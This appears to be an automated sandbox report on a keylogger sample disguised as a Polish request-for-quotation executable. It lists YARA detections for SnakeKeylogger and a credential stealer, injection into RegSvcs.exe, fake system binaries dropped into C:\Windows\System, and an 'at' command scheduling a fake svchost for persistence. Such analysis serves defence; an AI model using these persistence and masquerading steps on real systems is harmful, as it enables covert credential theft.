                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 0_2_0041F8300_2_0041F830
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 0_2_004161300_2_00416130
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 0_2_00422F500_2_00422F50
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00409A401_2_00409A40
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004120381_2_00412038
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004271611_2_00427161
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0047E1FA1_2_0047E1FA
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004212BE1_2_004212BE
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004433901_2_00443390
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004433911_2_00443391
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0041A46B1_2_0041A46B
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0041240C1_2_0041240C
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004465661_2_00446566
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004045E01_2_004045E0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0041D7501_2_0041D750
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004037E01_2_004037E0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004278591_2_00427859
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004128181_2_00412818
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0040F8901_2_0040F890
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0042397B1_2_0042397B
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00411B631_2_00411B63
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0047CBF01_2_0047CBF0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044EBBC1_2_0044EBBC
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00412C381_2_00412C38
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044ED9A1_2_0044ED9A
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00423EBF1_2_00423EBF
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00424F701_2_00424F70
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0041AF0D1_2_0041AF0D
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_03EE12801_2_03EE1280
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529C46810_2_0529C468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529649810_2_05296498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529C73810_2_0529C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529711810_2_05297118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529C14810_2_0529C148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529536210_2_05295362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529D27810_2_0529D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05299DE010_2_05299DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529CCD810_2_0529CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529CFAA10_2_0529CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_052969B010_2_052969B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529E98810_2_0529E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05299A2010_2_05299A20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529CA0810_2_0529CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529F63010_2_0529F630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529F64010_2_0529F640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05293E1810_2_05293E18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529E97A10_2_0529E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_052929EC10_2_052929EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05293A8910_2_05293A89
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529FA8810_2_0529FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0529FA9810_2_0529FA98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586954810_2_05869548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05869C1810_2_05869C18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586502810_2_05865028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586DDFF10_2_0586DDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586D54010_2_0586D540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586D55010_2_0586D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586CCA010_2_0586CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586FC5F10_2_0586FC5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586FC6810_2_0586FC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586178F10_2_0586178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_058617A010_2_058617A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586EF6010_2_0586EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05861E8010_2_05861E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586E6AF10_2_0586E6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586E6B010_2_0586E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586DE0010_2_0586DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05861E7010_2_05861E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586D9A710_2_0586D9A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586D9A810_2_0586D9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586295B10_2_0586295B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586296810_2_05862968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586D0F810_2_0586D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586000710_2_05860007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586F80110_2_0586F801
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586F81010_2_0586F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586501810_2_05865018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586004010_2_05860040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05868B9010_2_05868B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05868BA010_2_05868BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586F3A810_2_0586F3A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586F3B810_2_0586F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586EB0810_2_0586EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05860B2010_2_05860B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05860B3010_2_05860B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586EAF810_2_0586EAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586E24910_2_0586E249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0586E25810_2_0586E258
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: String function: 00445975 appears 65 times
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: String function: 0041171A appears 37 times
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: String function: 0041718C appears 45 times
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: String function: 0040E6D0 appears 35 times
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWin.exe vs ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeBinary or memory string: OriginalFilenameWin.exe vs ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: zapytanie ofertowe st-2024-s315 cpa9170385.exe PID: 1088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 5568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, icsys.icn.exe.0.dr, svchost.exe.5.dr, stsys.exe.6.dr, spoolsv.exe.4.dr, mrsys.exe.4.dr, explorer.exe.2.drBinary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.2046185098.000000000042C000.00000004.00000001.01000000.00000007.sdmp, spoolsv.exe, 00000005.00000002.2044481172.000000000042C000.00000004.00000001.01000000.0000000A.sdmp, spoolsv.exe, 00000007.00000002.2043327701.000000000042C000.00000004.00000001.01000000.0000000A.sdmp, explorer.exe, 00000031.00000002.2156485977.000000000042C000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: l`P@*\AD:\Code\Explorer\Explorer.vbp
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@398/19@47/10
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044AF5C GetLastError,FormatMessageW,1_2_0044AF5C
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,1_2_00464422
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004364AA
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,1_2_0045D517
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,1_2_0043701F
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,1_2_0047A999
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,1_2_0043614F
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeFile created: C:\Users\user\AppData\Local\icsys.icn.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5496:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                    Source: C:\Windows\System\explorer.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeFile created: C:\Users\user\AppData\Local\Temp\~DF7B1FDB34DDC64C15.TMPJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe
                    Source: unknownProcess created: C:\Windows\System\explorer.exe
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exeJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000003000000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.000000000300C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeFile read: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe "C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe"
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess created: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe "
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
                    Source: C:\Windows\System\explorer.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
                    Source: C:\Windows\System\spoolsv.exeProcess created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
